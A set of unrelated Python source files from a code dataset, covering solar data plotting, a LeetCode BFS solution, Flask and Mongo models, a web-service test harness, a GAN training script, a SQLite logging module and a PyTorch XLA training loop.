and amount of electricity generated ) are splited 28 days chunks\r\n# st_dev function is used to calculate the standard deviation of 28-day-chunks\r\n# mean function is used to calculate the average of 28-day-chunks\r\nfor i in range (1, len(amount_per_day) + 1):\r\n a28_days_chunk += [amount_per_day[i - 1]]\r\n if i % 28 == 0:\r\n mean_of_chunks += [mean(a28_days_chunk)]\r\n sd_of_chunks += [st_dev(a28_days_chunk)]\r\n a28_days_chunk = []\r\n\r\n#it makes a final chunk of days less than 28 days. \r\nif len(a28_days_chunk)!= 0:\r\n mean_of_chunks += [mean(a28_days_chunk)]\r\n sd_of_chunks += [st_dev(a28_days_chunk)]\r\n\r\n\r\n\r\n# this section includes the calculation of the values to be used in the graphic.\r\n# these values are:\r\n# @ the average of 28-day-chunks\r\n# @ the average of 28-day-chunks - standard deviation\r\n# @ the average of 28-day-chunks + standard deviation\r\n# @ an equation that fits the data \r\n########################################################################### \r\n# the equation used is: #\r\n# ________________________________________________ #\r\n# | | #\r\n# | n | #\r\n# | ∑ (7 * sin (( 579 / 100 ) * ( x + 2 )) + 9 ) | #\r\n# | 0 | #\r\n# |________________________________________________| #\r\n# #\r\n###########################################################################\r\nx = []\r\nmean_minus_sd = []\r\nmean_plus_sd = []\r\nfor i in range(0,len(mean_of_chunks)):\r\n mean_minus_sd += [mean_of_chunks[i] - sd_of_chunks[i]]\r\n mean_plus_sd += [mean_of_chunks[i] + sd_of_chunks[i]]\r\n x += [7 * math.sin(5.79 * ((i + 2))) + 9]\r\n\r\n\r\n\r\n\r\n##############################################\r\n########### graphicization #################\r\n##############################################\r\n \r\nfig = pylab.figure ()\r\nax = fig.add_subplot (111)\r\nax.grid (True)\r\nax.set_xlabel (\"28 Days Chunks\")\r\nax.set_ylabel (\"The Amount Of Electricity Generated\")\r\nax.set_title (\"ANALYSING SOLAR PANEL DATA\")\r\n\r\n\r\n# the plot of 28-day-chunks average \r\nax.plot (mean_of_chunks,color = 'red', linestyle = 'solid',\r\n marker = 'o',markerfacecolor = 'red', markersize = 3)\r\n\r\n# the plot of 28-day-chunks average - standard deviation\r\nax.plot (mean_minus_sd,color = 'black', linestyle = 'dashed',\r\n marker = 'o',markerfacecolor = 'black', markersize = 3)\r\n\r\n# the plot of 28-day-chunks average + standard deviation\r\nax.plot (mean_plus_sd,color = 'black', linestyle = 'dotted',\r\n marker = 'o',markerfacecolor = 'black', markersize = 3)\r\n\r\n# the plot of the quation that fits 28-day-chunks average \r\nax.plot (x,color = 'green', linestyle = 'solid',\r\n marker = 'o',markerfacecolor = 'black', markersize = 0)\r\n\r\n\r\n\r\npylab.show ()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"solar.py","file_name":"solar.py","file_ext":"py","file_size_in_byte":15468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"134921953","text":"#\n# @lc app=leetcode.cn id=127 lang=python3\n#\n# [127] 单词接龙\n#\n\n# @lc code=start\nimport collections\n\n\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str,\n wordList: List[str]) -> int:\n #DFS会超时,用BFS\n #方法1:BFS\n wordList = set(wordList)\n if endWord not in wordList or not beginWord or not endWord or not wordList:\n return 0\n n = len(beginWord)\n all_combo_word = collections.defaultdict(list)\n for word in wordList:\n for i in range(n):\n all_combo_word[word[:i] + '*' + word[i + 1:]].append(word)\n q = collections.deque()\n q.append((beginWord, 1))\n visited = {beginWord: True}\n while q:\n word, level = q.popleft()\n for i in range(n):\n for nxt in all_combo_word[word[:i] + '*' + word[i + 1:]]:\n if nxt not in visited:\n if nxt == endWord:\n return level + 1\n visited[nxt] = True\n q.append((nxt, level + 1))\n return 0\n\n\n# @lc code=end\n","sub_path":"Week_04/127.单词接龙-BFS1.py","file_name":"127.单词接龙-BFS1.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"280658471","text":"from src.common.database import Database\nimport uuid\nfrom flask import session\n#from src.models.invoices.invoice import Invoice\n#from src.models.invoices.invoice_item import Invoice_item\nfrom src.models.items.item_company import Item_company\nimport src.models.items.constants as ItemConstants\nfrom src.models.items.type import Type\n\n\nclass Item(object):\n def __init__(self, hsn, company_id, model_name, type_id, tax, price, _id=None):\n self.hsn = hsn\n self.company_id = Item_company.id_for_item(company_id)._id\n self.model_name = model_name\n self.type_id = Type.get_by_name_for_item(type_id)._id\n self.tax = tax\n self.price = price\n self._id = uuid.uuid4().hex if _id is None else _id\n\n def save_to_mongo(self):\n Database.update(ItemConstants.ITEM_COLLECTION,{\"_id\":self._id},self.json())\n\n\n\n def json(self):\n return {\n \"_id\" : self._id,\n \"hsn\" : self.hsn,\n \"company_id\" : self.company_id,\n \"model_name\" : self.model_name,\n \"type_id\" : self.type_id,\n \"tax\" : self.tax,\n \"price\" : self.price,\n }\n\n @classmethod\n def get_items(cls):\n if session['conditions'] != {}:\n x = session['conditions']\n session['conditions'] = {}\n return [cls(**elm) for elm in Database.find(ItemConstants.ITEM_COLLECTION, x)]\n else:\n return [cls(**elm) for elm in Database.find(ItemConstants.ITEM_COLLECTION,{})]\n\n @classmethod\n def get_by_name(cls,name):\n return cls(**Database.find_one(ItemConstants.ITEM_COLLECTION,{\"model_name\":name}))\n\n @classmethod\n def get_by_id(cls,id):\n return cls(**Database.find_one(ItemConstants.ITEM_COLLECTION,{\"_id\":id}))\n\n\n @staticmethod\n def get_data_for_list():\n json_datas = []\n items = Item.get_items()\n for item in items:\n item.company_id = Item_company.find_by_id(item.company_id)\n item.type_id = Type.get_by_id(item.type_id)\n x = \"\"\n\n json_data = {\n \"model_name\" : item.model_name,\n \"company\" : item.company_id.name,\n \"hsn\":item.hsn,\n \"item_type\":item.type_id.type_name,\n \"tax\":item.tax,\n \"price\": item.price,\n \"actions\" : x,\n }\n json_datas.append(json_data)\n #print(json_datas)\n return json_datas\n\n @staticmethod\n def count_items():\n return Database.count_documents(ItemConstants.ITEM_COLLECTION, {})\n\n\"\"\"\nHere delete is invoked from invoices\n\"\"\"\n\n# Database.initialize()\n# invoices = Item.get_items()\n# for invoice in invoices:\n# invoice.tax = float(invoice.tax)\n# invoice.price = float(invoice.price)\n# Database.update('items',{\"_id\" : invoice._id}, { \"$set\" : {\"tax\" : invoice.tax, \"price\" : invoice.price}})\n","sub_path":"src/models/items/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"466902225","text":"from flask import Blueprint, flash, g, redirect, render_template, request, url_for\n\n#from werkzeug.exeptions import abort\nfrom app.db import get_db\n\nbp = Blueprint('protocolo', __name__)\n\n@bp.route('/protocolo')\ndef index():\n db, c = get_db()\n c.execute(\n 'SELECT * FROM protocolo WHERE 1'\n )\n protocolos= c.fetchall()\n\n return render_template('protocolo/index.html', protocolos = protocolos)","sub_path":"protocolo.py","file_name":"protocolo.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"231619131","text":"import os\nimport ssl\nimport socket\nimport json\nimport subprocess\nimport time\n\ndef loadTestPlan(testPlanFilePath):\n with open(testPlanFilePath, 'r', encoding='utf-8') as f:\n testPlan = json.load(f)\n return testPlan\n\n\ndef doTest(testItem):\n # set default result\n result = dict()\n result['result'] = False\n result['message'] = ''\n # prepare options.json\n with open('options.json', 'r', encoding='utf-8') as f:\n optionsData = json.load(f)\n if testItem.get('useSSL', False):\n optionsData['usessl'] = True\n optionsData['standard_key_key'] = '/server.key'\n optionsData['standard_key_crt'] = '/server.crt'\n else:\n optionsData['usessl'] = False\n optionsData['standard_key_key'] = ''\n optionsData['standard_key_crt'] = ''\n optionsData['dataLogFile'] = '/datalog.json'\n optionsData['log_file'] = '/log.log'\n with open('options.json', 'w', encoding='utf-8') as f:\n json.dump(optionsData, f)\n try:\n # start pywebserviceemul\n emulProcess = subprocess.Popen(['python', '../pywebserviceemul.py', '-o', os.getcwd() + '/options.json'])\n # send test item query\n conn = socket.socket()\n if testItem.get('useSSL', False):\n wSock = ssl.wrap_socket(conn, ssl_version=ssl.PROTOCOL_TLS)\n else:\n wSock = conn\n wSock.connect((testItem['standard_server'], testItem['standard_port']))\n queryText = '' + testItem['method'] + ' ' + testItem['page'] + ' ' + testItem['format']\n queryText += '\\r\\n'\n for curHeaderKey, curHeaderValue in testItem['headers'].items():\n queryText += curHeaderKey + ': ' + curHeaderValue + '\\r'\n queryText += '\\n\\n'\n queryText += json.dumps(testItem['body'])\n wSock.send(queryText.encode())\n time.sleep(1)\n sdata = ''\n data = True\n while data:\n try:\n data = wSock.recv(1024)\n except socket.error:\n break\n sdata += data.decode()\n wSock.close()\n if sdata.find(testItem['answerText']) >= 0:\n result['result'] = True\n # stop pywebserviceemul\n emulProcess.kill()\n except Exception as errorObj:\n result['message'] = str(errorObj)\n #\n return result\n\n\ntestPlanData = loadTestPlan('testPlan.json')\nfor testItem in testPlanData:\n testResult = doTest(testItem)\n testResultText = '' + testItem['title'] + ' '\n if testResult['result']:\n testResultText = testResultText + 'passed'\n else:\n testResultText = testResultText + 'failed with message: ' + testResult['message']\n testResultText = testResultText\n print(testResultText)\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"478170519","text":"##! usr/bin/python3\n# %%\n\nimport config\nfrom src.model.cntdesc_model import define_cnt_encoder, ContentNet\nfrom src.model.stldesc_model import define_desc_encoder, StyleNet\nfrom src.model.gen_model import define_generator\nfrom src.support.loss_functions import pairWiseRankingLoss, MarginalAcc, triplet_loss\nfrom src.model.stldesc_model import define_desc_encoder, StyleNet, define_stl_encoder, define_stl_regressor, stl_encoder\n\n#from src.model.wavelet_gan_model import define_cnt_descriminator, define_gan, define_generator\n\nimport os \nimport logging\nimport time\nimport random\nfrom datetime import datetime\nfrom livelossplot import outputs\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nfrom numpy import load, zeros, ones\nimport pathlib\nfrom numpy.random import randint\nfrom sklearn.utils import shuffle\nimport tensorflow_addons as tfa\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.initializers import RandomNormal\nfrom tensorflow.keras.callbacks import TensorBoard\nimport tensorflow.keras.layers.experimental.preprocessing as prep\nfrom tensorflow.keras.models import load_model\nfrom matplotlib import pyplot\nfrom tensorflow.python.autograph.pyct import transformer\nfrom livelossplot import PlotLosses\nfrom livelossplot.outputs import MatplotlibPlot\n#%%\n# set logger\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n#tensorboard logger\nlogdir = config.LOG_DIR+ \"/gen_\" + datetime.now().strftime(\"%Y%m%d-%H%M%S\")\ntensorboard_callback = TensorBoard(log_dir=logdir, histogram_freq=1, profile_batch=1)\nrun_opts = tf.compat.v1.RunOptions(report_tensor_allocations_upon_oom = True)\n\ndef SM_SSIMLoss(ref_img, gen_img):\n one = tf.cast(tf.broadcast_to(1, shape=ref_img.shape), dtype=tf.float32)\n two = tf.cast(tf.broadcast_to(2, shape=ref_img.shape), dtype=tf.float32)\n rescaled_ref_img = tf.abs(tf.divide(tf.add(one, ref_img), two))\n rescaled_gen_img = tf.abs(tf.divide(tf.add(one, gen_img), two))\n loss = tf.image.ssim_multiscale(ref_img, gen_img, max_val=2, filter_size=3)\n return tf.reduce_mean(loss)\n\ndef mixLoss(ref_img, gen_img):\n one = tf.cast(tf.broadcast_to(1, shape=ref_img.shape), dtype=tf.float32)\n two = tf.cast(tf.broadcast_to(2, shape=ref_img.shape), dtype=tf.float32)\n rescaled_ref_img = tf.abs(tf.divide(tf.add(one, ref_img), two))\n rescaled_gen_img = tf.abs(tf.divide(tf.add(one, gen_img), two))\n l1_loss = tf.norm(ref_img-gen_img, ord=1, axis=0)/ref_img.shape[0]\n ms_ssim_loss = tf.reduce_mean(tf.image.ssim_multiscale(rescaled_ref_img, rescaled_gen_img, max_val=1, filter_size=3))\n alpha = tf.cast(config.GEN_LOSS_ALPHA, dtype=tf.float32)\n total_loss = alpha*ms_ssim_loss + (1-alpha)*l1_loss\n return tf.cast(total_loss, dtype=tf.float32)\n\n\ndef process_img(img):\n img = tf.image.decode_jpeg(img, channels=3) \n img = tf.image.convert_image_dtype(img, tf.float32) \n return tf.image.resize(img, config.IMAGE_SIZE)\n\ndef process_path(file_path):\n img = tf.io.read_file(file_path)\n img = tf.image.decode_jpeg(img, channels=3)\n #print(fp)\n img = tf.image.convert_image_dtype(img, tf.float32)\n img = tf.image.resize(img, size=(128, 128))\n return img\n\ndef train_gen():\n lower, higher, root_style_path, root_cnt_path, n = 1, 1100, './data/data/styleU', './data/data/MSO/MSOCntImg', 2000\n idx = np.random.choice(range(lower, higher), n, replace=True)\n for i in idx:\n #i = random.randint(lower, higher)\n random_num = random.randint(1, stenc_df.shape[0])\n # random_bool = random.randint(0,1)\n # if random_bool:\n # if random_num == int(i):\n # random_num = random.randint(lower, higher)\n # else:\n # random_num = max(random.randint(1,10), int(i)-5)\n cnt_det = os.path.join(root_cnt_path, f'{i}.jpg')\n stl_det = stenc_df.loc[random_num, ['path', 'style_code']]\n\n # label = 0\n # if img1_det['style_code'] == img2_det['style_code']:\n # label = 1\n #print(os.path.join(root_path, img1_det['path']), os.path.join(root_path, img2_det['path']))\n try :\n cnt_img = process_path(cnt_det)\n stl_path = os.path.join(root_style_path, stl_det['path'])\n stl_img = process_path(stl_path)\n yield stl_img, cnt_img, stl_det['style_code']\n except:\n # print(e)\n print(f\"Error in file {cnt_det} | {stl_path}\")\n continue\n\n# image resize and rescale pipeline\nresize_and_rescale = tf.keras.Sequential([\n prep.Resizing(config.IMG_HEIGHT, config.IMG_WIDTH),\n prep.Normalization()\n])\n\ndef prepare(ds, shuffle=False):\n # ds = ds.map(lambda x: tf.py_function(process_path, [x], [tf.float32, tf.float32, tf.int32]),\n # num_parallel_calls=tf.data.AUTOTUNE)\n\n # ds = ds.map(lambda x1, x2, y: (process_path(x1), process_path(x2), y),\n # num_parallel_calls=tf.data.AUTOTUNE)\n\n ds = ds.map(lambda slt, cnt, y: (resize_and_rescale(slt), resize_and_rescale(cnt), y),\n num_parallel_calls=tf.data.AUTOTUNE)\n\n ds = ds.cache()\n \n if shuffle:\n ds = ds.shuffle(1000)\n\n ds = ds.batch(16)\n return ds.prefetch(buffer_size=tf.data.AUTOTUNE)\n\n\n\n\ndef add_cnt_loss(dis_loss, gen_loss):\n return dis_loss + config.LAMBDAC*gen_loss\n\ndef add_style_loss(dis_loss, gen_loss):\n return dis_loss + config.LAMBDAS*gen_loss\n\ndef totalLoss(dss_loss, dsc_loss, gen_loss):\n gan_alpha = config.GAN_ALPHA\n gan_beta = config.GAN_BETA\n one = 1\n\n tot_loss = 0.5*dss_loss + 0.5*dsc_loss + gen_loss\n #tot_loss = gan_alpha*(gan_beta*dss_loss+(one-gan_beta)*dsc_loss)+(one-gan_alpha)*gen_loss\n return tf.cast(tot_loss, dtype=tf.float32)\n\n@tf.function\ndef train_step(cnt_in, style_in, stly):\n with tf.GradientTape() as gen_tape:\n gen_img = gen_model([cnt_in, style_in])\n cnt_vec, gen_vec = cnt_base_model(cnt_in), cnt_base_model(gen_img)\n stl_vec, gen_vec1 = stl_base_model(style_in), stl_base_model(gen_img)\n\n similarity = tf.einsum(\n \"ae,pe->ap\", stl_vec, gen_vec1\n )\n temp = 0.2\n similarity /= temp\n \n cnt_loss = pairWiseRankingLoss(cnt_vec, gen_vec, tf.cast(tf.broadcast_to(1, shape=[cnt_vec.shape[0]]), dtype=tf.bool))\n stl_loss = stlLoss(stly, similarity)\n gen_loss = genLoss(cnt_in, gen_img)\n total_loss = totalLoss(stl_loss,cnt_loss, gen_loss)\n\n grads = gen_tape.gradient(total_loss, gen_model.trainable_variables)\n opt.apply_gradients(zip(grads, gen_model.trainable_variables))\n #stl_metrics.update_state(gen_vec1, stly)\n #cnt_metrics.update_state(cnt_vec, gen_vec, tf.cast(tf.broadcast_to(1, shape=[cnt_vec.shape[0]]), dtype=tf.bool))\n return total_loss, gen_loss, cnt_loss, stl_loss\n\ndef load_pixel_metrics(filename):\n full_mat = np.load(filename)\n style_pixels = (full_mat['style']-127.5)/127.5\n content_pixels = (full_mat['cotent']-127.5)/127.5\n transfer_mat = (full_mat['transfers']-127.5)/127.5\n return style_pixels, content_pixels, transfer_mat\n\ndef generate_samples(dataset, n_samples, patch_shape):\n style, content= dataset.take(n_samples)\n return [cnt_pixels, style_pixels, mat_pixels], y_dc, y_ds\n\ndef generate_fake_samples(g_model, samples, patch_shape):\n cnt_img, style_img = samples\n X = g_model([cnt_img, style_img])\n y_dc = zeros((len(X), patch_shape, patch_shape, 1))\n y_ds = zeros((len(X)))\n return X, y_dc, y_ds\n\ndef summarize_performance(step, g_model, dataset, n_samples=3):\n cnt_sample, stl_sample = dataset\n gen_sample = g_model([cnt_sample, stl_sample])\n #rescale pixels values\n X_cnt = (cnt_sample+1)/2\n X_stl = (stl_sample+1)/2\n X_trn = (gen_sample+1)/2\n # plot samples\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + i)\n pyplot.axis('off')\n pyplot.imshow(X_cnt[i])\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + n_samples + i)\n pyplot.axis('off')\n pyplot.imshow(X_stl[i])\n for i in range(n_samples):\n pyplot.subplot(3, n_samples, 1 + 2*n_samples + i)\n pyplot.axis('off')\n pyplot.imshow(X_trn[i])\n # save result image \n filename = f'plot_s{step+1}.png'\n pyplot.savefig(os.path.join(config.GAN_LOG_DIR,filename))\n pyplot.close()\n # save model checkpoint\n # if step % 100:\n # model_filename = f'model_{step+1}.h5'\n # g_model.save(os.path.join(config.GAN_LOG_DIR,model_filename))\n # logger.info(f\">> Saved : {model_filename} \")\n\n\ndef train(epochs=3):\n #tensorboard_callback.set_model(desc_pre_model)\n plotlosses = PlotLosses(outputs=[MatplotlibPlot()], groups={'loss' : ['total_loss', 'gen_loss', 'stl_loss', 'cnt_loss']})\n for epoch in range(epochs):\n start_time = time.time()\n \n # Iterate over the batches of the dataset.\n for step, (style_batch, cnt_batch, stly_batch) in enumerate(train_dataset):\n total_loss, gen_loss, cnt_loss, stl_loss = train_step(cnt_batch, style_batch, stly_batch)\n\n # Run a validation loop at the end of each epoch.\n # for x_batch_val, y_batch_val in val_dataset:\n # val_loss = val_step(x_batch_val, y_batch_val)\n\n #stl_acc = stl_metrics.result()\n #cnt_acc = cnt_metrics.result()\n plotlosses.update({\n 'total_loss' : total_loss,\n 'gen_loss' : gen_loss,\n 'stl_loss' : stl_loss,\n 'cnt_loss' : cnt_loss\n #'stl_acc' : stl_acc,\n #'cnt_acc' : cnt_acc\n })\n plotlosses.send()\n\n #stl_metrics.reset_states()\n #cnt_metrics.reset_states()\n # val_acc = val_metrics.result()\n # val_metrics.reset_states()\n # print(\"Validation acc: %.4f\" % (float(val_acc),))\n print(\"Time taken: %.2fs\" % (time.time() - start_time))\n summarize_performance(epoch, gen_model, [cnt_batch, style_batch], 5)\n\n\n# def train(g_model, dataset, n_epoch=100, batch_size=16):\n# n_patch = dc_model.output_shape[1]\n# batch_per_epoch = (dataset[1].shape[0]*(dataset[1].shape[1]//2))//batch_size\n# n_steps = n_epoch*batch_per_epoch\n# plotlosses = PlotLosses(outputs=[MatplotlibPlot()], groups={'dss model' : ['dss_loss'], 'dsc model' : ['dsc_loss'], 'gan model' : ['gen_loss']})\n\n# save_interval = 10\n# log_interval = 1\n\n# for i in range(n_steps):\n# [X_cnt, X_stl, X_trn], ydc_real, yds_real = generate_real_samples(dataset, batch_size, n_patch)\n# X_fake_trn, ydc_fake, yds_fake = generate_fake_samples(g_model, [X_cnt, X_stl], n_patch)\n# # train style descriminator\n# usXds_stl = np.concatenate((X_stl, X_stl))\n# usXds_trn = np.concatenate((X_trn, X_fake_trn))\n# usysd = np.concatenate((yds_real, yds_fake))\n# Xds_stl, Xds_trn, yds = shuffle(usXds_stl, usXds_trn, usysd)\n# #train content descriminator\n# usXdc_cnt = np.concatenate((X_cnt, X_cnt))\n# usXdc_trn = np.concatenate((X_trn, X_fake_trn))\n# usydc = np.concatenate((ydc_real, ydc_fake))\n# Xdc_cnt, Xdc_trn, ydc = shuffle(usXdc_cnt, usXdc_trn, usydc)\n\n# #train GAN model\n# gen_loss, dc_loss, ds_loss = train_step(X_cnt, X_stl, X_trn, ydc_fake, yds_fake, Xds_stl, Xds_trn, yds, Xdc_cnt, Xdc_trn, ydc)\n \n\n# #logger.info(f'[{i}/{n_steps}] : style descriminator total loss : {ds_loss} \\n content descriminator total loss : {dc_loss} \\n GAN total loss : {gan_total_loss} | GAN dss loss : {gan_dss_loss} | GAN dsc loss : {gan_dsc_loss}')\n# if i % 10 == 0: \n# plotlosses.update({\n# 'dss_loss' : ds_loss,\n# 'dsc_loss' : dc_loss,\n# 'gen_loss' : gen_loss,\n# })\n# plotlosses.send()\n# if (i+1) % (batch_per_epoch*save_interval) == 0:\n# summarize_performance(i, g_model, dataset)\n# if i % 100 == 0:\n# summarize_performance(i, g_model, dataset)\n# if i == config.GAN_BP:\n# break\n\n#%%\nif __name__ == \"__main__\":\n #load dataset\n stenc_df = pd.read_csv('./data/data/styleU/StyleEnc.csv', index_col=0)\n train_path = pathlib.Path(os.path.join(config.DESC_ROOT_DIR,'train'))\n train_ds = tf.data.Dataset.from_generator(\n train_gen,\n output_signature=(\n tf.TensorSpec(shape=(128,128, 3), dtype=tf.float32),\n tf.TensorSpec(shape=(128,128,3), dtype=tf.float32),\n tf.TensorSpec(shape=(), dtype=tf.int32)\n )\n\n )\n train_dataset = prepare(train_ds, shuffle=True)\n\n cnt_model_dir = \"./data/models/descc_wgt4.h5\"\n stl_model_dir = \"./data/models/descs_wgt7.h5\"\n stl_base_model = stl_encoder(config.DESCS_LATENT_SIZE, config.IMAGE_SHAPE)\n stl_base_model.load_weights(stl_model_dir)\n cnt_base_model = define_cnt_encoder(config.DESCC_LATENT_SIZE, config.IMAGE_SHAPE)\n cnt_base_model.load_weights(cnt_model_dir)\n\n gen_model = define_generator(cnt_base_model, stl_base_model)\n\n train_steps = 100\n lr_fn = tf.optimizers.schedules.PolynomialDecay(1e-4, train_steps, 1e-5, 2)\n opt = tf.optimizers.Adam(lr_fn)\n\n #stl_metrics = MarginalAcc()\n stlLoss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n genLoss = tf.keras.losses.MeanAbsoluteError()\n #stl_metrics = tf.keras.metrics.MeanAbsoluteError()\n #cnt_metrics = MarginalAcc()\n #train model\n train(config.GAN_EPOCHS)\n\n# %%\n","sub_path":"gen_model_train1.py","file_name":"gen_model_train1.py","file_ext":"py","file_size_in_byte":13505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208135972","text":"import sqlite3 as db\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n# conn 함수 : Conn\r\n# disconn 함수 : DisConn\r\n# insert 함수 : InsertLog\r\n# select 함수 : SelectLog\r\n\r\n# 광고 시청자 정보 : avgPeople\r\n# 광고 시청자 정보\r\n\r\nglobal conn\r\nglobal c\r\n\r\n#path = './DaFarm/testDB.sqlite'\r\n\r\n# conn 함수\r\ndef Conn(path) :\r\n global conn\r\n global c\r\n conn = db.connect(path)\r\n c = conn.cursor()\r\n\r\n# disconn 함수\r\ndef DisConn() :\r\n global conn\r\n global c\r\n c.close()\r\n conn.close()\r\n\r\n# insert 함수\r\n'''Sex 성별 / Age 나이 / Watch 응시시간 / Time 시간 : PK / Station 역이름 / AD_ID 광고ID'''\r\ndef InsertLog(arg_list) :\r\n global conn\r\n global c\r\n \r\n age = arg_list[1]\r\n if 0 <= age < 10:\r\n age = '09'\r\n elif 10 <= age < 20:\r\n age = '1019'\r\n elif 20 <= age < 40:\r\n age = '2039'\r\n elif 40 <= age < 60:\r\n age = '4059'\r\n elif 60 <= age:\r\n age = '60'\r\n else:\r\n age = '100'\r\n\r\n sql_command = 'INSERT INTO AD_LOG VALUES(' + '\"' + str(arg_list[0]) + '\"' \\\r\n ', \"' + str(arg_list[1]) + '\"' \\\r\n ', \"' + str(arg_list[2]) + '\"' \\\r\n ',STRFTIME(\"%Y%m%d%H%M%f\", \"NOW\", \"LOCALTIME\")' \\\r\n ', \"' + str(arg_list[3]) + '\"' \\\r\n ', \"' + str(arg_list[4]) + '\");'\r\n\r\n c.execute(sql_command)\r\n conn.commit()\r\n print(\"AD_ID : {}, Station : {}, Sex : {}, Age : {} insert commit !!\".format(arg_list[4], arg_list[3], arg_list[0], arg_list[1]))\r\n\r\n# select 함수\r\ndef SelectLog(subNm, orderBy) :\r\n global conn\r\n global c\r\n order_sql = ''\r\n search_key = ''\r\n cnt = 0\r\n\r\n for i in subNm :\r\n cnt += 1\r\n if(cnt == 1) :\r\n search_key += '\"' + i + '\"'\r\n else :\r\n search_key += ', \"' + i + '\"'\r\n\r\n sql_command = 'SELECT Time' \\\r\n ' ,Sex' \\\r\n ' ,Age' \\\r\n ' ,Watch' \\\r\n ' ,Station' \\\r\n ' ,AD_ID ' \\\r\n ' FROM AD_LOG ' \\\r\n 'WHERE Station IN ('+ search_key +')'\r\n if orderBy == 0 : # 오름차순\r\n order_sql = ' ORDER BY TIME ASC'\r\n else : # 내림차순\r\n order_sql = ' ORDER BY TIME DESC'\r\n\r\n sql_command += order_sql\r\n\r\n print(sql_command)\r\n c.execute(sql_command)\r\n res = c.fetchall()\r\n if(res != None) :\r\n for i in res :\r\n print(i)\r\n\r\n\r\ndef avgPeople(df):\r\n df_pi = pd.crosstab(df['frameId'], df['gender'])\r\n df_pi['gender'] = df_pi['F'] < df_pi['M'] # True = M, False = F\r\n df_pi.drop(['F', 'M'], axis=1, inplace=True)\r\n\r\n df_gp = df.groupby(['frameId']).mean()\r\n df_gp.drop(['eyetime'], axis=1, inplace=True)\r\n\r\n df_gaze = df.groupby(['frameId', 'subNM']).sum()\r\n df_gaze.reset_index(inplace=True)\r\n df_gaze.drop(['age', 'AD_ID', 'frameId'], axis=1, inplace=True)\r\n\r\n result = pd.concat([df_pi, df_gp, df_gaze], axis=1, join_axes=[df_pi.index])\r\n result.reset_index(inplace=True)\r\n\r\n data_cnt = len(result)\r\n arg_list = list()\r\n\r\n if data_cnt > 0:\r\n for id_cnt in range(0, data_cnt):\r\n\r\n gender = ''\r\n age = ''\r\n\r\n if result.loc[id_cnt, 'gender']:\r\n gender = 'M'\r\n else:\r\n gender = 'F'\r\n\r\n if 0 <= result.loc[id_cnt, 'age'] < 10:\r\n age = '09'\r\n elif 10 <= result.loc[id_cnt, 'age'] < 20:\r\n age = '1019'\r\n elif 20 <= result.loc[id_cnt, 'age'] < 40:\r\n age = '2039'\r\n elif 40 <= result.loc[id_cnt, 'age'] < 60:\r\n age = '4059'\r\n elif 60 <= result.loc[id_cnt, 'age']:\r\n age = '60'\r\n else:\r\n age = '100'\r\n\r\n arg_list.append([gender\r\n , str(age)\r\n , str(result.loc[id_cnt, 'eyetime'])\r\n , result.loc[id_cnt, 'subNM']\r\n , str(result.loc[id_cnt, 'AD_ID'])])\r\n\r\n Conn()\r\n for arg in arg_list:\r\n # print(arg)\r\n InsertLog(arg)\r\n DisConn()\r\n\r\n return 0\r\n","sub_path":"dbConn.py","file_name":"dbConn.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66967674","text":"import torch\nfrom torch import nn\nimport torch_xla\nimport torch_xla.core.xla_model as xm\nimport torch_xla.distributed.xla_multiprocessing as xmp\nimport torch_xla.distributed.parallel_loader as pl\nfrom torchvision import transforms\n\nfrom projectcode.datasets.cifar10 import CifarDataset\nimport search.cifar10_search as my_cifar10\nimport datetime\nfrom misc.flops_counter import add_flops_counting_methods\nimport os\nimport numpy as np\nfrom collections import Callable\nfrom loguru import logger\nfrom misc.utils import Cutout\nimport argparse\n\n# import torch_optimizer as optim\n\nfrom projectcode.training.optim import Lamb\n\n\ndef get_map_fn(\n model: torch.nn.Module,\n train_params: dict,\n data_root: str,\n momentum: float,\n weight_decay: float,\n CIFAR_CLASSES: int,\n learning_rate: float,\n layers: int,\n batch_size: int,\n epochs: int,\n drop_path_prob: float = 0.0,\n save_pth: str = \"\",\n args: argparse.Namespace = None,\n WRAPPED_MODEL= None,\n clip = None,\n\n) -> Callable:\n \"\"\"\n Defines the distributed training function. Must run before training each individual to generate the\n training function for the individual. Also evaluates the individual and saves the results in a .pt file.\n\n TODO: Refactor as a class\n TODO: Fix the parameters by consolidating them, possibly via the args\n\n Args:\n model:\n train_params:\n data_root:\n momentum:\n weight_decay:\n CIFAR_CLASSES:\n learning_rate:\n layers:\n batch_size:\n epochs:\n drop_path_prob:\n save_pth: not actually used\n\n Returns:\n A function to be executed via\n FLAGS = {}\n xmp.spawn(map_fn, args=(FLAGS,), nprocs=8, start_method='fork')\n\n \"\"\"\n params = train_params\n # WRAPPED_MODEL = xmp.MpModelWrapper(model)\n\n def train(\n train_queue: pl.ParallelLoader,\n net: torch.nn.Module,\n criterion: Callable,\n optimizer: torch.optim.Optimizer,\n params: dict,\n device: torch.device,\n ):\n \"\"\"\n Training loop for a network.\n\n Args:\n train_queue:\n net:\n criterion:\n optimizer:\n params:\n device: pass the automatically assigned device via xm.spawn\n\n Returns:\n num correct, total loss, total num examples\n \"\"\"\n\n net.train()\n train_loss = 0\n correct = 0\n total = 